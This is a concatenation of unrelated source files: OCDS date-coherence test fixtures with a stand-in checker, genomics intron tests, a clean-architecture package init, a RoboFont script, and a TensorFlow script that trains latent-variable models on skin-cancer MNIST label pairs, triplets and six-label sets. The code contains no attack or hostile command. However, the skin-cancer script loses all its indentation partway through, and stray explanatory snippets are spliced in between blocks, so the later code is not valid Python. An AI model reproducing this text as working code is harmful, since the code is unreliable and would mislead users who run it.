                "path_1": "awards[0].documents[0].datePublished",
                "path_2": "date",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "awards[0].documents[0].dateModified",
                "path_2": "date",
                "value_1": "2020-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "contracts[0].documents[0].datePublished",
                "path_2": "contracts[0].documents[0].dateModified",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2020-12-31T00:00:00Z",
            },
            {
                "path_1": "contracts[0].documents[0].datePublished",
                "path_2": "date",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "contracts[0].documents[0].dateModified",
                "path_2": "date",
                "value_1": "2020-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "contracts[1].implementation.documents[0].datePublished",
                "path_2": "contracts[1].implementation.documents[0].dateModified",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2020-12-31T00:00:00Z",
            },
            {
                "path_1": "contracts[1].implementation.documents[0].datePublished",
                "path_2": "date",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "contracts[1].implementation.documents[0].dateModified",
                "path_2": "date",
                "value_1": "2020-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
        ]
    }
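The fixtures above exercise a coherence rule: each document's `datePublished` must not be later than its `dateModified`, and neither may be later than the compiled release's `date`, with every ordered pair counted as one application. As a minimal self-contained stand-in (not the pelican-backend implementation; written only to make the 18-comparison counting concrete):

```python
def check_documents_dates(item):
    """Minimal stand-in for the coherence check exercised above.

    Each document contributes three ordered-date comparisons; identically
    formatted ISO-8601 strings compare correctly as plain strings.
    """
    release_date = item.get("date")
    docs = list(item.get("planning", {}).get("documents", []))
    docs += item.get("tender", {}).get("documents", [])
    for award in item.get("awards", []):
        docs += award.get("documents", [])
    for contract in item.get("contracts", []):
        docs += contract.get("documents", [])
        docs += contract.get("implementation", {}).get("documents", [])
    if release_date is None or not docs:
        return {"result": None, "application_count": None, "pass_count": None,
                "meta": {"reason": "insufficient data for check"}}
    applications = passes = 0
    for doc in docs:
        published, modified = doc["datePublished"], doc["dateModified"]
        for earlier, later in ((published, modified),
                               (published, release_date),
                               (modified, release_date)):
            applications += 1
            passes += earlier <= later
    return {"result": passes == applications,
            "application_count": applications, "pass_count": passes}
```

With `item_ok` above this counts 6 documents and therefore 18 comparisons, matching the fixtures' expected `application_count`.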
# File: tests/test_intron.py
# Repo: jareyw/intron (license: Apache-2.0)
"""Test intron."""
from ngs_test_utils import testcase

from intron import (
    intronCounter_v2_stranded,
    make_conserved_gtf,
    make_conserved_intron_gtf,
)


class IntronTestCase(testcase.NgsTestCase):
    """Test intron."""

    def setUp(self):
        self.outdir = self.get_tmp_dir()
        self.pkw = {"is_paired": True, "is_proper_pair": True}

    def test_long_gene_removed(self):
        gtf = self.make_gtf(
            [
                dict(
                    seqname="chr1",
                    feature="exon",
                    start=1,
                    end=100,
                    strand="+",
                    transcript_id="NM_1",
                    gene_id="G1",
                ),
                dict(
                    seqname="chr1",
                    feature="exon",
                    start=2_000_000,
                    end=2_000_100,
                    strand="+",
                    transcript_id="NM_1",
                    gene_id="G1",
                ),
            ]
        )

        ann1 = self.get_filename(extension="gtf")
        make_conserved_gtf.process_gtf(gtf, ann1, source="UCSC")

        # Make sure that the long gene is not included.
        self.assertEqual(self.tsv_to_list(ann1), [])

    def test_intron_ucsc(self):
        gtf = self.make_gtf(
            [
                dict(
                    seqname="chr1",
                    feature="exon",
                    start=99,
                    end=199,
                    strand="+",
                    transcript_id="NM_1",
                    gene_id="G1",
                ),
                dict(
                    seqname="chr1",
                    feature="exon",
                    start=299,
                    end=399,
                    strand="+",
                    transcript_id="NM_1",
                    gene_id="G1",
                ),
            ]
        )
        bam = self.make_bam(
            chroms=[("chr1", 1000)],
            segments=[
                dict(
                    qname="r1",
                    pos=150,
                    pnext=350,
                    cigar=[(0, 75)],
                    is_read1=True,
                    is_reverse=True,
                    **self.pkw,
                ),
                dict(
                    qname="r1",
                    pos=350,
                    pnext=150,
                    cigar=[(0, 75)],
                    is_read2=True,
                    mate_is_reverse=True,
                    **self.pkw,
                ),
            ],
        )

        ann1 = self.get_filename(extension="gtf")
        ann2 = self.get_filename(extension="gtf")
        result = self.get_filename(extension="gtf")

        make_conserved_gtf.process_gtf(gtf, ann1, source="UCSC")
        make_conserved_intron_gtf.process_gtf(ann1, ann2)
        intronCounter_v2_stranded.intronCounter(bam, ann2, result)

        self.assertEqual(
            self.tsv_to_list(result, columns=[3, 4, 9, 10, 11]),
            [["200", "299", "1", "1", "5000000.0"]],
        )

    def test_intron_ensembl(self):
        gtf = self.make_gtf(
            [
                dict(
                    seqname="1",
                    feature="exon",
                    start=99,
                    end=199,
                    strand="+",
                    transcript_id="T1",
                    gene_id="G1",
                    gene_biotype="protein_coding",
                    transcript_support_level="1",
                ),
                dict(
                    seqname="1",
                    feature="exon",
                    start=299,
                    end=399,
                    strand="+",
                    transcript_id="T1",
                    gene_id="G1",
                    gene_biotype="protein_coding",
                    transcript_support_level="1",
                ),
            ]
        )
        bam = self.make_bam(
            chroms=[("1", 1000)],
            segments=[
                dict(
                    qname="r1",
                    pos=150,
                    pnext=350,
                    cigar=[(0, 75)],
                    is_read1=True,
                    is_reverse=True,
                    **self.pkw,
                ),
                dict(
                    qname="r1",
                    pos=350,
                    pnext=150,
                    cigar=[(0, 75)],
                    is_read2=True,
                    mate_is_reverse=True,
                    **self.pkw,
                ),
            ],
        )

        ann1 = self.get_filename(extension="gtf")
        ann2 = self.get_filename(extension="gtf")
        result = self.get_filename(extension="gtf")

        make_conserved_gtf.process_gtf(gtf, ann1, source="ENSEMBL")
        make_conserved_intron_gtf.process_gtf(ann1, ann2)
        intronCounter_v2_stranded.intronCounter(bam, ann2, result)

        self.assertEqual(
            self.tsv_to_list(result, columns=[3, 4, 9, 10, 11]),
            [["200", "299", "1", "1", "5000000.0"]],
        )
# File: auctions/auctions/domain/value_objects/__init__.py
# Repo: Enforcer/clean-architecture-example-1 (license: MIT)
from auctions.domain.value_objects.currency import Currency
from auctions.domain.value_objects.money import Money
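This `__init__.py` re-exports the `Currency` and `Money` value objects. As a self-contained illustration of the value-object pattern behind such exports (these are hypothetical stand-ins, not the package's real class definitions):

```python
from dataclasses import dataclass
from decimal import Decimal


@dataclass(frozen=True)
class Currency:
    """Immutable currency descriptor; equality is by value, not identity."""
    code: str
    symbol: str


@dataclass(frozen=True)
class Money:
    """An amount bound to a currency; frozen, so instances are hashable."""
    currency: Currency
    amount: Decimal


usd = Currency(code="USD", symbol="$")
# Two value objects carrying the same data are interchangeable.
assert Money(usd, Decimal("10.00")) == Money(Currency("USD", "$"), Decimal("10.00"))
```

Freezing the dataclasses gives the identity-free, side-effect-free semantics that clean-architecture domain layers expect from value objects.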
# File: hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/outline.py
# Repo: frankrolf/hTools2_extension (license: BSD-3-Clause)
# [h] outline glyphs dialog
import hTools2.dialogs.glyphs.outline
import importlib
importlib.reload(hTools2.dialogs.glyphs.outline)
hTools2.dialogs.glyphs.outline.outlineGlyphsDialog()
# File: test/skin_cancer_mnist_tests.py
# Repo: AndrewRLawrence/dp_gp_lvm (license: MIT)
"""
This module tests the various models using the skin cancer MNIST data set.
"""
from src.data_io.skin_cancer_mnist_reader import read_64d_luminance
from src.models.dp_gp_lvm import dp_gp_lvm
from src.models.gaussian_process import bayesian_gp_lvm as bgplvm, manifold_relevance_determination as mrd
from src.utils.constants import ResultKeys, RESULTS_FILE_NAME, DATA_PATH
from src.utils.types import NP_DTYPE
import src.visualisation.plotters as vis
from itertools import combinations
import matplotlib.pyplot as plot
import numpy as np
from os.path import isfile
from sklearn.preprocessing import StandardScaler, MinMaxScaler
import tensorflow as tf
from time import time
if __name__ == '__main__':

    # Train model. Model/optimisation parameters. Using values from elros as larger ones use too much GPU memory.
    num_samples = 100
    num_inducing_points = 35
    num_latent_dimensions = 15
    truncation_level = 20
    train_iter = 5000
    learning_rate = 0.01

    # Read original data.
    image_data, labels = read_64d_luminance(DATA_PATH + 'skin_cancer_mnist/')

    # Loop through each unique pair of labels to create training data sets.
    for label_1, label_2 in combinations(np.unique(labels), 2):

        # Define file path for results.
        dataset_str = 'skin_cancer_mnist_{}_{}'.format(label_1, label_2)
        bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
                                                       dataset=dataset_str)
        mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
                                                    dataset=dataset_str)
        # mrd_fully_independent_results_file = RESULTS_FILE_NAME.format(model='mrd_fully_independent',
        #                                                               dataset=dataset_str)
        gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
                                                     dataset=dataset_str)
        # gpdp_mask_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm_mask_64',
        #                                                   dataset=dataset_str)

        # Load randomised data for specific label pair if any of the model results do not exist.
        if any([not isfile(bgplvm_results_file),
                not isfile(mrd_results_file),
                # not isfile(mrd_fully_independent_results_file),
                # not isfile(gpdp_mask_results_file),
                not isfile(gpdp_results_file)]):

            two_conditions_data_file = DATA_PATH + \
                'skin_cancer_mnist/two_conditions_data_{}_{}.npy'.format(label_1, label_2)
            if isfile(two_conditions_data_file):
                # Read numpy file of randomised data.
                two_groups_images = np.load(two_conditions_data_file)
            else:
                group_1_images = image_data[np.equal(labels, label_1)]
                group_2_images = image_data[np.equal(labels, label_2)]

                # Update number of samples if specific label does not have enough.
                num_samples = 100
                num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0])

                # Randomly permute observations.
                np.random.seed(1)  # Random seed.
                rand_indices_1 = np.random.permutation(group_1_images.shape[0])
                rand_indices_2 = np.random.permutation(group_2_images.shape[0])

                # Combine into [num_samples x 128] data.
                two_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
                                               group_2_images[rand_indices_2[:num_samples]]))
                assert two_groups_images.shape[0] == num_samples, 'Number of subsampled observations is not equal.'
                assert two_groups_images.shape[1] == 128, \
                    'Number of pixels does not match expected number of 64 for each group.'

                # Save randomised data.
                np.save(two_conditions_data_file, two_groups_images)

            # Normalise data to zero mean and unit variance.
            scaler = StandardScaler()
            y_train = scaler.fit_transform(two_groups_images)
            num_samples, num_output_dimensions = y_train.shape

            # Print info.
            print('\nSkin Cancer MNIST Data:')
            print('  Total number of observations (N): {}'.format(num_samples))
            print('  Total number of output dimensions (D): {}'.format(num_output_dimensions))
            print('  Diagnosis labels: ({}, {})'.format(label_1, label_2))

            # Define instance of necessary model.
            if not isfile(bgplvm_results_file):
                # Reset default graph before building new model graph. This speeds up script.
                tf.reset_default_graph()
                np.random.seed(1)  # Random seed.
                model = bgplvm(y_train=y_train,
                               num_inducing_points=num_inducing_points,
                               num_latent_dims=num_latent_dimensions)
                model_training_objective = model.objective

                # Optimisation.
                model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
                    loss=model_training_objective)

                with tf.Session() as s:
                    # Initialise variables.
                    s.run(tf.global_variables_initializer())

                    # Training optimisation loop.
                    start_time = time()
                    print('\nTraining BGP-LVM:')
                    for c in range(train_iter):
                        s.run(model_opt_train)
                        if (c % 100) == 0:
                            print('  BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
                    end_time = time()
                    train_opt_time = end_time - start_time
                    print('Final iter {:5}:'.format(c))
                    print('  BGP-LVM: {}'.format(s.run(model_training_objective)))
                    print('Time to optimise: {} s'.format(train_opt_time))

                    # Get converged values as numpy arrays.
                    ard_weights, noise_precision, signal_variance, inducing_input = \
                        s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
                    x_mean, x_covar = s.run(model.q_x)

                    # Save results.
                    print('\nSaving results to .npz file.')
                    np.savez(bgplvm_results_file, original_data=two_groups_images, y_train=y_train,
                             ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
                             x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time)

            if not isfile(mrd_results_file):
                # Reset default graph before building new model graph. This speeds up script.
                tf.reset_default_graph()
                np.random.seed(1)  # Random seed.
                # Define instance of MRD with known views.
                model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 128, 64)],
                            num_inducing_points=num_inducing_points,
                            num_latent_dims=num_latent_dimensions)
                model_training_objective = model.objective

                # Optimisation.
                model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
                    loss=model_training_objective)

                with tf.Session() as s:
                    # Initialise variables.
                    s.run(tf.global_variables_initializer())

                    # Training optimisation loop.
                    start_time = time()
                    print('\nTraining MRD:')
                    for c in range(train_iter):
                        s.run(model_opt_train)
                        if (c % 100) == 0:
                            print('  MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
                    end_time = time()
                    train_opt_time = end_time - start_time
                    print('Final iter {:5}:'.format(c))
                    print('  MRD: {}'.format(s.run(model_training_objective)))
                    print('Time to optimise: {} s'.format(train_opt_time))

                    # Get converged values as numpy arrays.
                    ard_weights, noise_precision, signal_variance, inducing_input = \
                        s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
                    x_mean, x_covar = s.run(model.q_x)

                    # Save results.
                    print('\nSaving results to .npz file.')
                    np.savez(mrd_results_file, original_data=two_groups_images, y_train=y_train,
                             ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
                             x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time)

            # if not isfile(mrd_fully_independent_results_file):
            #     # Reset default graph before building new model graph. This speeds up script.
            #     tf.reset_default_graph()
            #     np.random.seed(1)  # Random seed.
            #     # Define instance of fully independent MRD.
            #     model = mrd(views_train=[y_train[:, i:i + 1] for i in range(0, 128, 1)],
            #                 num_inducing_points=num_inducing_points,
            #                 num_latent_dims=num_latent_dimensions)
            #
            #     model_training_objective = model.objective
            #     # Optimisation.
            #     model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
            #         loss=model_training_objective)
            #
            #     with tf.Session() as s:
            #         # Initialise variables.
            #         s.run(tf.global_variables_initializer())
            #
            #         # Training optimisation loop.
            #         start_time = time()
            #         print('\nTraining F.I. MRD:')
            #         for c in range(train_iter):
            #             s.run(model_opt_train)
            #             if (c % 100) == 0:
            #                 print('  F.I. MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
            #         end_time = time()
            #         train_opt_time = end_time - start_time
            #         print('Final iter {:5}:'.format(c))
            #         print('  F.I. MRD: {}'.format(s.run(model_training_objective)))
            #         print('Time to optimise: {} s'.format(train_opt_time))
            #
            #         # Get converged values as numpy arrays.
            #         ard_weights, noise_precision, signal_variance, inducing_input = \
            #             s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
            #         x_mean, x_covar = s.run(model.q_x)
            #
            #         # Save results.
            #         print('\nSaving results to .npz file.')
            #         np.savez(mrd_fully_independent_results_file, original_data=two_groups_images, y_train=y_train,
            #                  ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
            #                  x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time)
if not isfile(gpdp_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. The DP mask defaults to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(s.run(model_training_objective)))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=two_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time)
# if not isfile(gpdp_mask_results_file):
# # Reset default graph before building new model graph. This speeds up script.
# tf.reset_default_graph()
# np.random.seed(1) # Random seed.
# # Define instance of DP-GP-LVM with DP mask of 64.
# model = dp_gp_lvm(y_train=y_train,
# num_inducing_points=num_inducing_points,
# num_latent_dims=num_latent_dimensions,
# truncation_level=truncation_level,
# mask_size=64)
#
# model_training_objective = model.objective
# # Optimisation.
# model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
# loss=model_training_objective)
#
# with tf.Session() as s:
# # Initialise variables.
# s.run(tf.global_variables_initializer())
#
# # Training optimisation loop.
# start_time = time()
# print('\nTraining DP-GP-LVM:')
# for c in range(train_iter):
# s.run(model_opt_train)
# if (c % 100) == 0:
# print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
# end_time = time()
# train_opt_time = end_time - start_time
# print('Final iter {:5}:'.format(c))
# print(' DP-GP-LVM: {}'.format(s.run(model_training_objective)))
# print('Time to optimise: {} s'.format(train_opt_time))
#
# # Get converged values as numpy arrays.
# ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
# s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
# model.assignments))
# x_mean, x_covar = s.run(model.q_x)
# w_1, w_2 = s.run(model.dp.q_alpha)
# gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
#
# # Save results.
# print('\nSaving results to .npz file.')
# np.savez(gpdp_mask_results_file, original_data=two_groups_images, y_train=y_train,
# ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
# x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
# gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
# q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time)
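# Illustrative sanity check (added sketch, not part of the original experiment):
# the per-column normalisation performed by StandardScaler in the loops below is
# equivalent to subtracting each column mean and dividing by the column standard
# deviation. Self-contained NumPy demo with dummy data in place of image pixels:
import numpy as np
_demo = np.arange(12, dtype=float).reshape(4, 3)
_demo_scaled = (_demo - _demo.mean(axis=0)) / _demo.std(axis=0)
assert np.allclose(_demo_scaled.mean(axis=0), 0.0)
assert np.allclose(_demo_scaled.std(axis=0), 1.0)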
# Loop through each unique triplet of labels to create training data sets.
for label_1, label_2, label_3 in combinations(np.unique(labels), 3):
# May need to update variational parameter sizes to avoid GPU memory overflow.
num_inducing_points = 35
num_latent_dimensions = 15
truncation_level = 20
# Define file path for results.
dataset_str = 'skin_cancer_mnist_{}_{}_{}'.format(label_1, label_2, label_3)
bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
dataset=dataset_str)
mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
dataset=dataset_str)
gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
dataset=dataset_str)
# Load randomised data for the specific label triplet if any of the model results do not exist.
if any([not isfile(bgplvm_results_file),
not isfile(mrd_results_file),
not isfile(gpdp_results_file)]):
three_conditions_data_file = DATA_PATH + \
'skin_cancer_mnist/three_conditions_data_{}_{}_{}.npy'.format(label_1, label_2, label_3)
if isfile(three_conditions_data_file):
# Read NumPy file of randomised data.
three_groups_images = np.load(three_conditions_data_file)
else:
group_1_images = image_data[np.equal(labels, label_1)]
group_2_images = image_data[np.equal(labels, label_2)]
group_3_images = image_data[np.equal(labels, label_3)]
# Update number of samples if specific label does not have enough.
num_samples = 100
num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0],
group_3_images.shape[0])
# Randomly permute observations.
np.random.seed(1) # Random seed.
rand_indices_1 = np.random.permutation(group_1_images.shape[0])
rand_indices_2 = np.random.permutation(group_2_images.shape[0])
rand_indices_3 = np.random.permutation(group_3_images.shape[0])
# Combine into [num_samples x 192] data.
three_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
group_2_images[rand_indices_2[:num_samples]],
group_3_images[rand_indices_3[:num_samples]]))
assert three_groups_images.shape[0] == num_samples, 'Number of subsampled observations does not match num_samples.'
assert three_groups_images.shape[1] == 192, \
'Number of pixels does not match the expected 64 per group (3 x 64 = 192).'
# Save randomised data.
np.save(three_conditions_data_file, three_groups_images)
# Normalise data to zero mean and unit variance.
scaler = StandardScaler()
y_train = scaler.fit_transform(three_groups_images)
num_samples, num_output_dimensions = y_train.shape
# Print info.
print('\nSkin Cancer MNIST Data:')
print(' Total number of observations (N): {}'.format(num_samples))
print(' Total number of output dimensions (D): {}'.format(num_output_dimensions))
print(' Diagnosis labels: ({}, {}, {})'.format(label_1, label_2, label_3))
# Define instance of necessary model.
if not isfile(bgplvm_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
model = bgplvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining BGP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' BGP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(bgplvm_results_file, original_data=three_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(mrd_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of MRD with known views.
model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 192, 64)],
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining MRD:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' MRD: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(mrd_results_file, original_data=three_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(gpdp_results_file):
# Reset the default graph before building a new model graph; this speeds up the script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. The DP mask defaults to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=three_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time, final_cost=final_cost)
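# Quick sanity check on the label-set enumeration (added sketch): for the seven
# HAM10000 diagnosis labels, combinations() yields each sorted subset exactly
# once, so these loops visit C(7, 3) = 35 triplets, C(7, 6) = 7 six-label sets
# and C(7, 7) = 1 full set. Aliased import keeps this block self-contained.
from itertools import combinations as _combinations
assert len(list(_combinations(range(7), 3))) == 35
assert len(list(_combinations(range(7), 6))) == 7
assert len(list(_combinations(range(7), 7))) == 1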
# Loop through each unique set of six labels to create training data sets.
for label_1, label_2, label_3, label_4, label_5, label_6 in combinations(np.unique(labels), 6):
# May need to update variational parameter sizes to avoid GPU memory overflow.
num_inducing_points = 21
num_latent_dimensions = 25
truncation_level = 20
# Define file path for results.
dataset_str = 'skin_cancer_mnist_{}_{}_{}_{}_{}_{}'.format(label_1, label_2, label_3, label_4, label_5, label_6)
bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
dataset=dataset_str)
mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
dataset=dataset_str)
gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
dataset=dataset_str)
# Load randomised data for the specific label set if any of the model results do not exist.
if any([not isfile(bgplvm_results_file),
not isfile(mrd_results_file),
not isfile(gpdp_results_file)]):
six_conditions_data_file = DATA_PATH + \
'skin_cancer_mnist/six_conditions_data_{}_{}_{}_{}_{}_{}.npy'.format(label_1, label_2, label_3, label_4,
label_5, label_6)
if isfile(six_conditions_data_file):
# Read NumPy file of randomised data.
six_groups_images = np.load(six_conditions_data_file)
else:
group_1_images = image_data[np.equal(labels, label_1)]
group_2_images = image_data[np.equal(labels, label_2)]
group_3_images = image_data[np.equal(labels, label_3)]
group_4_images = image_data[np.equal(labels, label_4)]
group_5_images = image_data[np.equal(labels, label_5)]
group_6_images = image_data[np.equal(labels, label_6)]
# Update number of samples if specific label does not have enough.
num_samples = 70
num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0],
group_3_images.shape[0], group_4_images.shape[0], group_5_images.shape[0],
group_6_images.shape[0])
# Randomly permute observations.
np.random.seed(1) # Random seed.
rand_indices_1 = np.random.permutation(group_1_images.shape[0])
rand_indices_2 = np.random.permutation(group_2_images.shape[0])
rand_indices_3 = np.random.permutation(group_3_images.shape[0])
rand_indices_4 = np.random.permutation(group_4_images.shape[0])
rand_indices_5 = np.random.permutation(group_5_images.shape[0])
rand_indices_6 = np.random.permutation(group_6_images.shape[0])
# Combine into [num_samples x 384] data.
six_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
group_2_images[rand_indices_2[:num_samples]],
group_3_images[rand_indices_3[:num_samples]],
group_4_images[rand_indices_4[:num_samples]],
group_5_images[rand_indices_5[:num_samples]],
group_6_images[rand_indices_6[:num_samples]]))
assert six_groups_images.shape[0] == num_samples, 'Number of subsampled observations does not match num_samples.'
assert six_groups_images.shape[1] == 384, \
'Number of pixels does not match the expected 64 per group (6 x 64 = 384).'
# Save randomised data.
np.save(six_conditions_data_file, six_groups_images)
# Normalise data to zero mean and unit variance.
scaler = StandardScaler()
y_train = scaler.fit_transform(six_groups_images)
num_samples, num_output_dimensions = y_train.shape
# Print info.
print('\nSkin Cancer MNIST Data:')
print(' Total number of observations (N): {}'.format(num_samples))
print(' Total number of output dimensions (D): {}'.format(num_output_dimensions))
